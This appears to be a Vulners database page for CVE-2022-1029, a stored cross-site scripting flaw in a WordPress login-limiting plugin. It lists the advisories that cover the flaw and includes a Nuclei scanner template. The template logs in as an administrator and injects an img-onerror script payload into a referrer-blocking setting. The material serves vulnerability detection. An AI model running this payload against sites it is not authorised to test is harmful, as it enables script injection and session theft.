| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2022-1029 | 27 Jun 202209:15 | – | attackerkb | |
| CVE-2022-1029 | 12 Dec 202513:44 | – | circl | |
| WordPress plugin Limit Login Attempts 跨站脚本漏洞 | 27 Jun 202200:00 | – | cnnvd | |
| WordPress Limit Login Attempts plugin跨站脚本漏洞 | 30 Jun 202200:00 | – | cnvd | |
| CVE-2022-1029 | 27 Jun 202208:56 | – | cve | |
| CVE-2022-1029 Limit Login Attempts < 4.0.72 - Admin+ Stored Cross-Site Scripting | 27 Jun 202208:56 | – | cvelist | |
| EUVD-2022-24378 | 3 Oct 202520:07 | – | euvd | |
| CVE-2022-1029 | 27 Jun 202209:15 | – | nvd | |
| WordPress Limit Login Attempts plugin <= 4.0.71 - Authenticated Stored Cross-Site Scripting (XSS) vulnerability | 6 Jun 202200:00 | – | patchstack | |
| Cross site scripting | 27 Jun 202209:15 | – | prion |
| Source | Link |
|---|---|
| nvd | www.nvd.nist.gov/vuln/detail/CVE-2022-1029 |
id: CVE-2022-1029
info:
name: Limit Login Attempts - Stored Cross-Site Scripting
author: theamanrawat
severity: medium
description: |
Limit Login Attempts WordPress plugin < 4.0.72 contains a stored cross-site scripting caused by unsanitized and unescaped settings, letting malicious administrators inject Javascript code, exploit requires administrator privileges.
impact: |
Attackers with administrator privileges can execute malicious Javascript in the context of the site, potentially stealing cookies or hijacking user sessions.
remediation: |
Update to version 4.0.72 or later.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-1029
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
cve-id: CVE-2022-1029
epss-score: 0.00848
epss-percentile: 0.53478
cwe-id: CWE-79
metadata:
verified: true
max-requests: 2
public-www: "/wp-content/plugins/miniorange-limit-login-attempts/"
tags: cve,cve2022,wordpress,wp,wp-plugin,miniorange-limit-login-attempts,xss,authenticated
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
matchers:
- type: dsl
dsl:
- status_code == 302
- contains(header, "wordpress_logged_in")
condition: and
internal: true
- raw:
- |
POST /wp-admin/admin.php?page=advancedblocking HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
option=mo_wpns_block_referrer&referrer_1=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "referrerblockingtable", "<img src=x onerror=alert(document.domain)>")'
condition: and
# digest: 490a0046304402204e592c277aeb74a7f794cd19a62d8d9429b939805e2aad5c7f28ed643b35f5b3022004daae2fe35e6271ecd24c94bb5cdf8a2689cc9e12119e0142e698989a86909e:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation